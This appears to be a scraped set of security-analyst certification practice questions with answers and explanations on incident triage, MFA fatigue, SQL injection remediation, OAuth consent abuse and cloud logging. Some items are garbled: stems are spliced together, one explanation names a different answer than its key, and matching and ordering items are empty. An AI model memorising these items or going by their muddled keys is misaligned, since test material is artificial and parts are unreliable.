EDR typically records process creations and network connections off-host.

Why this answer

EDR telemetry is the most reliable source because it captures process creation, network connections, file modifications, and registry changes in real-time, storing them off-host. Even if an attacker deletes local system logs, the EDR agent's telemetry stream remains intact on the central management server, providing a forensic timeline of the attacker's actions.

Exam trap

CompTIA often tests the misconception that backup tapes are the ultimate forensic source, but the trap here is that attackers often delete logs during the incident, and only real-time, off-host telemetry (like EDR) preserves the sequence of events that occurred on the compromised host.

How to eliminate wrong answers

Option A is wrong because a memory dump from before the attack would not contain evidence of the attack itself; it captures a snapshot of the system state at that earlier time, not the attacker's activities. Option C is wrong because network flow logs (e.g., NetFlow, IPFIX) only record metadata like source/destination IPs, ports, and byte counts, not the actual system-level events (e.g., log deletion, process execution) that occurred on the compromised server. Option D is wrong because backup tapes contain point-in-time copies of files and system state, but they are typically taken on a schedule (e.g., nightly) and may not include the logs that were deleted during the attack window; moreover, restoring from backup is time-consuming and may overwrite current evidence.

330
MCQeasy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Office document spawning a script interpreter from a user context
B.High CPU usage on the print server
C.A password expiry warning
D.Successful DHCP renewal
AnswerA

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

Option A is correct because the scenario describes a classic phishing attack where a malicious macro or embedded script in an Office document (the invoice) executes wscript.exe from the user's profile. This behavior matches the detection logic of 'Office document spawning a script interpreter from a user context,' which is a key indicator of script-based malware execution. The root-cause analysis would identify the malicious document as the initial vector, directly explaining the subsequent process execution.

Exam trap

Cisco often tests the distinction between a security detection logic (process ancestry) and unrelated operational metrics (CPU usage, password expiry) to see if candidates can focus on the direct cause of a security incident rather than being distracted by noise.

How to eliminate wrong answers

Option B is wrong because high CPU usage on the print server is unrelated to the endpoint execution of wscript.exe from a user profile; it describes a performance issue, not a security event involving script execution. Option C is wrong because a password expiry warning is an administrative notification that does not explain the execution of a script interpreter from a user context; it is a separate operational concern, not a root cause for malicious process spawning.

331
MCQmedium

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.DNS tunnelling
B.SSL certificate expiry
C.MFA fatigue or push-bombing attack
D.Password spraying only
AnswerC

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

The scenario describes MFA fatigue (also called push-bombing), where an attacker repeatedly sends MFA push notifications to a user until the user, annoyed or confused, approves one. This is a social engineering technique that exploits human behavior, not a technical vulnerability. Option C correctly identifies this attack pattern, which is a known tactic in credential-stuffing and account-takeover campaigns.

Exam trap

Cisco often tests the distinction between technical exploits (like DNS tunnelling) and human-factor attacks (like MFA fatigue), so candidates may mistakenly choose a technical-sounding option when the question describes user behavior rather than a protocol-level attack.

How to eliminate wrong answers

Option A is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2 channels; it does not involve repeated MFA prompts or user approval. Option B is wrong because SSL certificate expiry causes browser warnings or connection failures, not repeated MFA push notifications; it is a certificate lifecycle issue, not an authentication attack.

332
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.The SIEM parser is always broken
B.A scheduled password rotation completed successfully
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The file share requires more storage capacity
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

A deception credential that no legitimate user should know being used to authenticate to a server is a classic indicator of credential theft and lateral movement. In the alert triage phase, this finding warrants high-priority investigation because it suggests an attacker has successfully extracted the credential from the file share and is using it to move laterally within the network, which is a critical security incident.

Exam trap

Cisco often tests the concept that deception credentials are specifically designed to detect credential theft and lateral movement, and candidates may mistakenly think this indicates a benign process like password rotation or a SIEM misconfiguration.

How to eliminate wrong answers

Option A is wrong because a broken SIEM parser would typically cause missing or malformed logs, not the generation of a specific, actionable alert about a deception credential being used for authentication. Option B is wrong because a scheduled password rotation would update the credential on the server, not trigger an authentication event using the old deception credential; password rotation does not involve authentication attempts with the credential being rotated.

333
MCQmedium

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Review application logs for query errors, authentication events, and abnormal database access
B.Disable the WAF rule because it may be noisy
C.Ask users to change passwords without checking logs
D.Treat every HTTP 200 as proof of exploitation
AnswerA

HTTP 200 can occur for blocked, handled, or successful requests; application and database context determine impact.

Why this answer

Option A is correct because the WAF alerts indicate potential SQL injection attempts, but HTTP 200 responses do not rule out successful exploitation. The analyst must review application logs for actual query errors, authentication anomalies, or unauthorized database access to confirm whether the injection succeeded. Without log correlation, the analyst cannot determine if the WAF blocked the attack or if the payload bypassed it and executed on the backend.

Exam trap

Cisco often tests the misconception that HTTP 200 means no compromise occurred, when in fact SQL injection can succeed while returning a normal status code, especially with blind injection or when the application catches errors gracefully.

How to eliminate wrong answers

Option B is wrong because disabling the WAF rule without investigation removes a critical security control and ignores the possibility that the alerts represent real attacks that bypassed detection or were partially blocked. Option C is wrong because forcing password changes without verifying logs fails to address the root cause and may cause unnecessary user disruption; it assumes compromise without evidence, which violates the principle of validate-before-remediate.

334
MCQeasy

A critical vulnerability affected the customer portal, but no evidence of exploitation was found. What should the executive summary emphasize? If the primary audience is SOC manager, which content choice is most appropriate?

A.Business risk, customer impact assessment, remediation status, and remaining exposure
B.Every command the scanner executed
C.Raw packet captures from the scan
D.A list of analyst shift times only
AnswerA

Executives need business impact and risk posture, not raw technical noise. The report should be tuned to SOC manager while preserving factual accuracy.

Why this answer

Option A is correct because an executive summary for a SOC manager must focus on business risk, customer impact, remediation status, and remaining exposure. Since no exploitation was found, the emphasis shifts to the potential impact and the steps taken to mitigate the vulnerability, aligning with the SOC manager's need to communicate risk to leadership and prioritize resources.

Exam trap

Cisco often tests the distinction between technical detail and executive-level reporting, trapping candidates who think raw data or scan logs are appropriate for a summary aimed at a SOC manager who needs actionable risk insights, not raw output.

How to eliminate wrong answers

Option B is wrong because listing every command the scanner executed is too technical and granular for an executive summary; it belongs in a detailed technical report for analysts, not a high-level overview for a SOC manager. Option C is wrong because raw packet captures from the scan are irrelevant to an executive summary; they provide no context on business risk or remediation and are only useful for deep forensic analysis, not for communicating the vulnerability's status to management.

335
MCQeasy

A medium-sized company has experienced a ransomware attack that encrypted critical file servers. The incident response team has contained the outbreak and restored data from backups. The CISO has requested a post-incident report. The report must include a timeline, root cause analysis, lessons learned, and recommendations. The security team is currently overwhelmed with recovery tasks. The CISO wants the report delivered in 24 hours. Which of the following is the BEST course of action for the security analyst assigned to write the report?

A.Wait until all recovery tasks are complete to ensure accurate information
B.Delegate the report writing to a junior analyst while focusing on technical recovery
C.Use the incident response playbook template to draft the report immediately, incorporating available information and noting gaps
D.Request an extension from the CISO due to resource constraints
AnswerC

Allows for a timely draft that can be refined later, meeting the deadline while documenting what is known.

Why this answer

Option C is correct because the CISO needs a timely post-incident report within 24 hours, and using the incident response playbook template allows the analyst to immediately draft the report with available information while noting gaps. This approach balances the urgency of the deadline with the need for structured documentation, even though recovery tasks are ongoing. It ensures that critical findings are captured promptly without waiting for full recovery, which could delay lessons learned and recommendations.

Exam trap

CompTIA often tests the tension between thoroughness and timeliness in incident reporting, and the trap here is that candidates may choose to wait for complete data (Option A) or delegate (Option B) instead of using a structured template to meet the deadline while acknowledging information gaps.

How to eliminate wrong answers

Option A is wrong because waiting until all recovery tasks are complete would likely exceed the 24-hour deadline, delaying the CISO's required report and potentially missing the window for actionable recommendations. Option B is wrong because delegating to a junior analyst without proper oversight could introduce inaccuracies in the timeline, root cause analysis, and lessons learned, especially if the junior lacks incident response experience. Option D is wrong because requesting an extension due to resource constraints may not be feasible given the CISO's explicit deadline, and it fails to leverage available templates and existing data to meet the requirement.

336
MCQmedium

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Correlate DNS query logs with endpoint process and network connection telemetry
B.Search only for successful HTTP 200 responses
C.Block all DNS traffic from the subnet
D.Delete the host from the SIEM asset inventory
AnswerA

The pattern is suspicious, but process and connection context shows whether a host process is repeatedly attempting outbound C2 communication.

Why this answer

Option A is correct because correlating DNS query logs with endpoint process and network connection telemetry directly validates command-and-control (C2) beaconing. The algorithmically generated domains (AGDs) and NXDOMAIN responses are classic indicators of a domain generation algorithm (DGA) attempting to resolve a C2 server that may be offline or blocked. By linking the DNS queries to specific processes and network connections on the endpoint, the analyst can confirm whether the workstation is executing malicious code that generates these queries, rather than benign software or a false positive.

Exam trap

Cisco often tests the misconception that NXDOMAIN responses are irrelevant or that blocking all traffic is a safe containment step, when in reality the key is to correlate multiple data sources to confirm malicious activity without prematurely destroying evidence.

How to eliminate wrong answers

Option B is wrong because searching only for successful HTTP 200 responses would miss the majority of DGA-based C2 traffic, which often results in NXDOMAIN responses when the C2 server is not yet active or has been sinkholed; C2 beaconing frequently relies on failed DNS resolutions as part of its algorithm. Option C is wrong because blocking all DNS traffic from the subnet would immediately disrupt network operations for all hosts, potentially alerting the adversary and destroying volatile evidence such as active network connections and process memory, violating the containment trade-off principle of preserving forensic data before taking disruptive action.

337
MCQhard

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Web server access logs from the public website
B.Endpoint antivirus quarantine reports only
C.Cloud audit logs for identity, policy, and key-management API calls
D.Packet captures from user laptops only
AnswerC

Control-plane attacks are best investigated through authoritative audit events that record who changed identity and access configuration.

Why this answer

Option C is correct because cloud audit logs (e.g., AWS CloudTrail, Azure Monitor, GCP Cloud Audit Logs) capture control-plane API calls such as IAM policy changes, access key creation, and failed console logons. These logs directly record identity and access management operations, providing the strongest evidence of control-plane compromise by showing who made the changes, from which source IP, and at what time.

Exam trap

Cisco often tests the distinction between data-plane logs (e.g., web server logs) and control-plane logs (e.g., cloud audit logs), tricking candidates into choosing web logs because they seem more familiar, even though they cannot capture IAM or key management events.

How to eliminate wrong answers

Option A is wrong because web server access logs from a public website only record HTTP requests to the application layer (e.g., GET/POST to a web app), not IAM policy changes or key creation, which are control-plane operations. Option B is wrong because endpoint antivirus quarantine reports only detect malware on individual hosts, not cloud-level identity or policy changes; they are irrelevant to control-plane API calls.

338
MCQhard

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

A.Host-based intrusion prevention system (HIPS)
B.Full disk encryption
C.Network segmentation with strict firewall rules
D.Application whitelisting
AnswerC

Segmentation limits the ability to connect to other hosts, hindering lateral movement.

Why this answer

Network segmentation with strict firewall rules (C) is the most effective control because it directly restricts the ability of an attacker who has compromised one host to initiate connections to other hosts. By enforcing least-privilege network access between segments (e.g., using VLANs and ACLs), lateral movement techniques such as port scanning, SMB relay, or RDP brute force are blocked at the network layer, regardless of the attacker's shell access.

Exam trap

CompTIA often tests the misconception that endpoint controls like HIPS or application whitelisting are sufficient to stop lateral movement, but the trap here is that once an attacker has a shell, they can often bypass or disable host-based controls, whereas network segmentation is a preventive control that operates independently of the compromised host's state.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion prevention system (HIPS) monitors and blocks malicious behavior on the compromised host itself, but once the attacker has a shell, they can often disable or evade HIPS before pivoting; HIPS does not prevent network-level lateral movement to other hosts. Option B is wrong because full disk encryption protects data at rest on the compromised host's storage, but it does nothing to prevent the attacker from using the host as a pivot point to reach other systems over the network. Option D is wrong because application whitelisting controls which executables can run on the compromised host, but the attacker already has a shell and can use built-in OS tools (e.g., PowerShell, netcat) or living-off-the-land binaries to pivot; whitelisting does not block network connections to other hosts.

339
MCQeasy

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

A.Review the user's recent activity for other anomalies.
B.Add the IP address to the block list.
C.Contact the user to verify if they logged in.
D.Disable the user account immediately.
AnswerC

Quickest way to confirm if it was the user or a compromise.

Why this answer

Option D is correct because quickly contacting the user can confirm whether the login was authorized (e.g., using a VPN or traveling). Disabling the account or blocking the IP without verification could impact productivity. Option C is a good follow-up but not the first step.

340
MCQeasy

A security analyst is preparing a monthly dashboard for the board of directors. Which metric would best demonstrate the effectiveness of the security program in reducing risk?

A.Number of security incidents detected.
B.Mean time to detect (MTTD) and mean time to respond (MTTR).
C.Percentage of employees who completed security awareness training.
D.Number of firewall rules configured.
AnswerB

These metrics directly reflect the efficiency of detection and response processes.

Why this answer

Mean time to detect (MTTD) and mean time to respond (MTTR) directly quantify the security program's operational efficiency in identifying and containing threats, which reduces the window of exposure and potential damage. A lower MTTD/MTTR indicates faster detection and response, directly correlating with reduced risk from incidents. This makes it the best metric for demonstrating risk reduction effectiveness to the board.

Exam trap

CompTIA often tests the misconception that volume or compliance metrics (like incident count or training completion) directly indicate risk reduction, when in fact operational efficiency metrics (MTTD/MTTR) are the true measure of a security program's effectiveness in minimizing impact.

How to eliminate wrong answers

Option A is wrong because the number of security incidents detected is a volume metric that does not indicate how quickly or effectively incidents are handled; a high number could reflect better detection rather than higher risk, and it provides no insight into response quality. Option C is wrong because the percentage of employees who completed security awareness training is a compliance or training metric that measures awareness, not the operational effectiveness of the security program in detecting and responding to active threats. Option D is wrong because the number of firewall rules configured is a configuration metric that does not measure risk reduction; more rules can increase complexity and attack surface without improving security posture.

341
MCQeasy

A security analyst is conducting a vulnerability assessment of a web application. The assessment reveals that the application is vulnerable to SQL injection. Which of the following is the MOST effective remediation?

A.Upgrade the web application framework to the latest version
B.Deploy a web application firewall (WAF)
C.Use parameterized queries in the application code
D.Implement client-side input validation
AnswerC

Parameterized queries eliminate SQL injection vulnerabilities.

Why this answer

Parameterized queries (also known as prepared statements) are the most effective remediation for SQL injection because they separate SQL logic from user-supplied data by using placeholders. The database engine treats the input strictly as data, not executable code, which prevents an attacker from altering the query structure. This addresses the root cause at the application layer, unlike other controls that only mitigate or detect the attack.

Exam trap

CompTIA often tests the misconception that a WAF is a sufficient fix for SQL injection, but the trap here is that a WAF is a compensating control, not a remediation—the question asks for the 'most effective remediation,' which must address the root cause in the code.

How to eliminate wrong answers

Option A is wrong because upgrading the web application framework may patch known vulnerabilities but does not fix the insecure coding practice of concatenating user input into SQL statements; the SQL injection flaw remains if the code itself is not changed. Option B is wrong because a web application firewall (WAF) can detect and block some SQL injection payloads, but it is a reactive, signature-based control that can be bypassed with obfuscation or novel attack patterns, and it does not eliminate the underlying vulnerability. Option D is wrong because client-side input validation can be easily bypassed by an attacker using tools like Burp Suite or cURL to send crafted requests directly to the server, and it provides no security against server-side injection.

342
MCQhard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence source phase, Which evidence source best supports or refutes the detection?

A.Increase the dashboard refresh interval
B.Move logs to cold storage immediately
C.Log normalization and field mapping in the parser
D.Disable all enrichment lookups
AnswerC

Detection rules depend on consistent normalized fields across sources.

Why this answer

Option C is correct because inconsistent field mapping (source IP, user, action) prevents the SIEM from correlating events correctly. Log normalization via a parser ensures that fields from the new cloud log source are transformed into a consistent schema (e.g., ECS or CIM), enabling analytics to function. Without fixing the parser, the data remains unusable regardless of other configuration changes.

Exam trap

Cisco often tests the misconception that performance tuning (e.g., refresh intervals) or storage management (e.g., cold storage) can fix data quality issues, when the real problem is a misconfigured parser or normalization step in the ingestion pipeline.

How to eliminate wrong answers

Option A is wrong because increasing the dashboard refresh interval does not address the root cause of inconsistent field mapping; it only changes how often the dashboard updates, which would still show incomplete or misaligned data. Option B is wrong because moving logs to cold storage immediately would archive the data without resolving the parsing issue, making the logs inaccessible for real-time analytics and failing to fix the mapping inconsistency.

343
MCQhard

A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?

A.No mention of the accepted risk
B.Only the analyst's personal opinion
C.Risk owner, reason, compensating controls, review date, and expiry
D.A permanent exception with no review
AnswerC

Risk acceptance must be accountable, time-bound, and visible. The report should be tuned to legal/privacy stakeholder while preserving factual accuracy.

Why this answer

Option C is correct because when a business owner accepts delayed remediation for a production system, the report must formally document the risk acceptance. This includes the risk owner, the reason for accepting the risk, any compensating controls in place, a review date to reassess the risk, and an expiry date for the acceptance. For a legal/privacy stakeholder, this documentation provides an auditable trail that demonstrates due diligence and compliance with regulatory requirements, such as GDPR or HIPAA.

Exam trap

Cisco often tests the misconception that a risk acceptance report can simply note the decision without detailing the compensating controls or expiry, leading candidates to choose an incomplete answer that omits critical audit trail elements.

How to eliminate wrong answers

Option A is wrong because omitting the accepted risk from the report would violate audit and compliance standards; legal/privacy stakeholders require full disclosure of all risks to assess liability and regulatory exposure. Option B is wrong because including only the analyst's personal opinion is subjective and lacks the objective, verifiable data needed for legal and privacy review; such opinions are not defensible in an audit or legal proceeding.

344
Matchingmedium

Match each regulatory framework to its focus.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Data privacy in EU

Payment card security

Healthcare data protection

Financial reporting controls

Federal information security

Why these pairings

Compliance frameworks are essential for governance.

345
MCQmedium

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?

A.Password spraying only
B.MFA fatigue or push-bombing attack
C.DNS tunnelling
D.SSL certificate expiry
AnswerB

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

Repeated MFA prompts that the user eventually approves out of frustration or habit is the hallmark of MFA fatigue (also called push-bombing). The attacker sends a flood of push notifications to the user's device, hoping the user will mistakenly approve one to stop the annoyance. This bypasses the MFA control without needing to compromise the second factor.

Exam trap

Cisco often tests the distinction between 'MFA fatigue' and 'password spraying' — candidates mistakenly choose password spraying because they focus on the repeated attempts, but the key is that the attacker already has the password and is abusing the MFA approval process, not guessing passwords.

How to eliminate wrong answers

Option A is wrong because password spraying involves trying a few common passwords against many accounts, not targeting a single user with repeated MFA prompts. Option C is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2, not to overwhelm a user with MFA approval requests.

346
Multi-Selecthard

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Select 2 answers
A.Disable all identity alerts
B.Require a second signal such as new device, failed MFA, or mailbox rule creation
C.Add trusted VPN egress ranges as named/known locations
D.Treat every VPN login as malicious
AnswersB, C

Combining identity anomalies reduces false positives.

Why this answer

Option B is correct because requiring a second signal—such as a new device, failed MFA, or mailbox rule creation—adds an additional layer of verification that helps confirm the user's identity and intent. This reduces false positives from VPN users whose IP addresses may change rapidly, as the SIEM can now correlate the impossible travel event with other suspicious activities that indicate a genuine compromise rather than a legitimate VPN connection.

Exam trap

Cisco often tests the misconception that disabling identity alerts is a valid refinement, but this would eliminate all identity-based detection, whereas the correct approach is to add context (trusted ranges and secondary signals) to reduce noise without losing detection capability.

347
Multi-Selecthard

A security analyst is prioritizing vulnerabilities from a scan. Which TWO factors should be considered to determine the remediation priority? (Select TWO)

Select 2 answers
A.Exploit code availability
B.Vendor patch availability
C.Number of affected systems
D.CVSS base score
E.Age of the vulnerability
AnswersA, C

Public exploits increase the urgency for remediation.

Why this answer

Exploit code availability is a critical factor because if working exploit code is publicly available, the vulnerability is far more likely to be actively exploited, increasing the risk and urgency for remediation. This directly impacts the likelihood of a breach, making it a key priority driver beyond just the CVSS score.

Exam trap

Cisco often tests the misconception that CVSS base score alone determines priority, but the exam emphasizes that exploit availability and asset criticality (here, number of affected systems) are more actionable for remediation prioritization.

348
MCQeasy

A security analyst notices a single external IP address attempting to log in to multiple user accounts on the company's VPN server over the past hour. All attempts have failed. What should the analyst do FIRST?

A.Block the IP address at the firewall.
B.Notify law enforcement.
C.Verify the logs and escalate to the incident response team.
D.Disable the VPN server.
AnswerC

Verifying logs confirms the incident, and escalation ensures proper handling.

Why this answer

Option C is correct because the first step in incident response is to verify the logs to confirm the activity is not a false positive (e.g., a misconfigured client or legitimate brute-force testing) and then escalate to the incident response team for coordinated action. This aligns with the NIST SP 800-61 incident response lifecycle, where identification and validation precede containment. Blocking or disabling without verification could disrupt legitimate access or destroy forensic evidence.

Exam trap

CompTIA often tests the candidate's ability to resist the urge to immediately contain or notify external parties; the trap here is choosing a reactive containment step (blocking or disabling) before performing the critical validation and escalation step required by the incident response framework.

How to eliminate wrong answers

Option A is wrong because blocking the IP at the firewall without first verifying the logs may be premature; the IP could be a shared NAT address or a false positive, and blocking it could prevent further analysis or alert the attacker. Option B is wrong because law enforcement is typically notified only after the incident is confirmed, scoped, and deemed criminal in nature; notifying them as a first step wastes resources and may violate chain-of-custody procedures. Option D is wrong because disabling the entire VPN server is an extreme containment measure that would deny service to all legitimate users and should only be considered after verification and as part of a coordinated incident response plan.

349
Drag & Dropmedium

Order the steps for setting up a SIEM (Security Information and Event Management) system.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

SIEM setup includes installation, log source configuration, rule definition, log onboarding, and dashboard creation.

350
Multi-Selectmedium

Which findings should be included when reporting remediation performance to asset owners? (Choose two.)

Select 2 answers
A.Recently remediated findings awaiting validation
B.Every raw scanner debug line
C.Unrelated physical-access badge failures
D.Open critical findings past SLA by owner
AnswersA, D

This shows work completed but not yet verified.

Why this answer

Recently remediated findings awaiting validation are a critical metric for asset owners because they confirm that remediation actions have been taken and are pending verification. This aligns with the vulnerability management lifecycle, where validation ensures the fix was applied correctly and no residual risk remains. Including this status in reports provides asset owners with actionable insight into the progress of remediation efforts and any outstanding steps needed to close the finding.

Exam trap

Cisco often tests the distinction between operational data (e.g., raw scanner logs) and actionable remediation metrics, tempting candidates to select overly detailed or irrelevant information instead of the concise, status-driven data that asset owners need.

351
MCQhard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For validation, Which action should be taken before closing or downgrading the finding?

A.Remediate alphabetically by CVE ID
B.Prioritize the KEV/high-EPSS issue after confirming asset exposure
C.Always sort only by CVSS base score
D.Remediate only vulnerabilities with vendor logos in the report
AnswerB

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option B is correct because the CISA KEV vulnerability with high EPSS indicates active exploitation in the wild, making it a critical threat regardless of its medium CVSS base score. Prioritizing it after confirming asset exposure ensures the organization addresses the most imminent risk first, as high CVSS issues that are not exploitable in the environment pose no actual danger. This aligns with risk-based vulnerability management, where exploitability and threat intelligence (KEV, EPSS) override raw severity scores.

Exam trap

Cisco often tests the misconception that CVSS base score alone determines priority, but the trap here is that real-world risk assessment must incorporate threat intelligence (KEV, EPSS) and environmental context (exploitability) to avoid wasting resources on non-exploitable high-severity issues.

How to eliminate wrong answers

Option A is wrong because remediating alphabetically by CVE ID ignores all risk factors, such as exploitability, asset exposure, and threat intelligence, leading to inefficient and potentially dangerous prioritization. Option C is wrong because sorting only by CVSS base score neglects environmental context (e.g., non-exploitable high CVSS issues) and active exploitation indicators (KEV, EPSS), which are critical for effective vulnerability management.

352
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Delete historical flow records to reduce SIEM cost
B.Assume encryption means the transfer is safe
C.Correlate flow volume with database audit logs and the destination reputation
D.Disable all outbound internet access for the organisation
AnswerC

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option C is correct because correlating the flow volume with database audit logs allows you to identify which specific records or queries were accessed during the anomalous transfers, while checking the destination reputation helps determine if the unfamiliar AS is known for data exfiltration or is a legitimate service. This combination directly addresses the suspicious behavior—large encrypted outbound transfers during off-hours—by linking network evidence to host-based logs, which is essential for triaging a potential data breach. Without this correlation, you cannot distinguish between a legitimate backup or replication job and malicious exfiltration.

Exam trap

Cisco often tests the misconception that encryption implies trustworthiness, but the trap here is that encrypted traffic can still be malicious, and the correct triage step is to correlate network flows with host-based logs and external reputation data rather than assuming safety or destroying evidence.

How to eliminate wrong answers

Option A is wrong because deleting historical flow records destroys forensic evidence and violates data retention policies (e.g., PCI DSS, GDPR), and it does not address the triage need to investigate the suspicious activity. Option B is wrong because encryption does not guarantee safety; attackers commonly use TLS/SSL to exfiltrate data covertly, and the encryption itself is a red flag when combined with off-hours transfers to an unfamiliar AS.

353
MCQeasy

A third-party provider caused an outage during remediation. What should the communication to the vendor focus on? If the primary audience is SOC manager, which content choice is most appropriate?

A.A public press statement draft first
B.Confidential unrelated customer data
C.Timeline, service impact, evidence, required corrective actions, and contractual follow-up
D.Internal blame speculation
AnswerC

Vendor communications should be factual and tied to obligations and remediation. The report should be tuned to SOC manager while preserving factual accuracy.

Why this answer

Option C is correct because when a third-party vendor causes an outage during remediation, the communication must focus on operational and contractual details: the exact timeline of the outage, the scope of service impact (e.g., number of users affected, systems down), evidence (e.g., logs, monitoring alerts), required corrective actions to prevent recurrence, and contractual follow-up (e.g., SLA breach, penalties). This aligns with the SOC manager's need for actionable, factual data to manage incident response and vendor accountability, not public relations or unrelated data.

Exam trap

Cisco often tests the distinction between internal operational communication (for SOC managers) and external/public communication (for PR or legal), so candidates mistakenly choose a press statement or irrelevant data instead of the structured incident details required for vendor accountability.

How to eliminate wrong answers

Option A is wrong because a public press statement draft is premature and inappropriate for internal communication to a SOC manager; the primary audience needs technical and operational details, not public messaging. Option B is wrong because sharing confidential unrelated customer data violates data privacy regulations (e.g., GDPR, HIPAA) and is irrelevant to the vendor-caused outage; the communication must focus on the incident itself, not exposing other customer information.

354
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Assume encryption means the transfer is safe
B.Delete historical flow records to reduce SIEM cost
C.Disable all outbound internet access for the organisation
D.Correlate flow volume with database audit logs and the destination reputation
AnswerD

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating the flow volume with database audit logs allows the analyst to verify if the outbound transfers correspond to legitimate database queries or exports, while checking the destination reputation helps determine if the autonomous system is known for malicious activity. This combination provides the clearest triage value by directly linking the network anomaly to potential data exfiltration or a compromised database server, without prematurely disrupting operations or ignoring the encryption indicator.

Exam trap

The trap here is that candidates assume encryption (option A) guarantees safety, but Cisco tests the understanding that encryption can be used to conceal malicious activity, and the correct triage step is to correlate with other logs and threat intelligence rather than making assumptions based on encryption alone.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; in fact, encrypted outbound transfers during off-hours to an unfamiliar AS are a classic indicator of data exfiltration (e.g., using TLS to hide stolen data). Option B is wrong because deleting historical flow records destroys forensic evidence and violates retention policies (e.g., PCI DSS, GDPR), and it does not help triage the current alert. Option C is wrong because disabling all outbound internet access is an overly drastic response that would disrupt legitimate business operations and is not a triage step; it should only be considered after analysis confirms a threat.

355
MCQhard

During a post-compromise review, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? which action should be prioritized before closure?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant to stop the attacker's access, then review the mailbox for any data exfiltration or rules created, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, ensuring the threat is neutralized and scope is understood before moving to eradication and recovery.

Exam trap

CompTIA often tests the misconception that MFA or password resets are sufficient to revoke OAuth app access, but the trap is that OAuth tokens are independent of the user's authentication factor and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app has a token that bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not address the root cause—the attacker still retains access via the OAuth grant. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token; the app can continue to access the mailbox using its own stored tokens.

356
MCQhard

Refer to the exhibit. A security analyst is reviewing an S3 bucket policy in AWS. What is the primary security misconfiguration?

A.The bucket policy grants anonymous read access to all objects.
B.The bucket policy allows all actions.
C.The bucket policy does not require encryption.
D.The bucket policy uses an outdated version.
AnswerA

Principal: '*' means anyone, including anonymous users, can read objects.

Why this answer

The bucket policy includes a principal of '*' without any condition restricting access to authenticated users, which grants anonymous (unauthenticated) read access to all objects in the S3 bucket. This violates the principle of least privilege and exposes data to anyone on the internet, making it the primary security misconfiguration.

Exam trap

CompTIA often tests the distinction between a policy that allows 'all actions' versus one that allows 'read access' but with a public principal, tricking candidates into focusing on the action scope rather than the identity granting anonymous access.

How to eliminate wrong answers

Option B is wrong because while the policy allows 's3:GetObject' (not all actions), the core issue is the anonymous principal, not the action scope. Option C is wrong because the policy does not explicitly require encryption, but that is a secondary concern; the primary misconfiguration is the public access grant. Option D is wrong because the policy version (2012-10-17) is current and not outdated; the version field is a syntax requirement, not a security control.

357
Multi-Selecthard

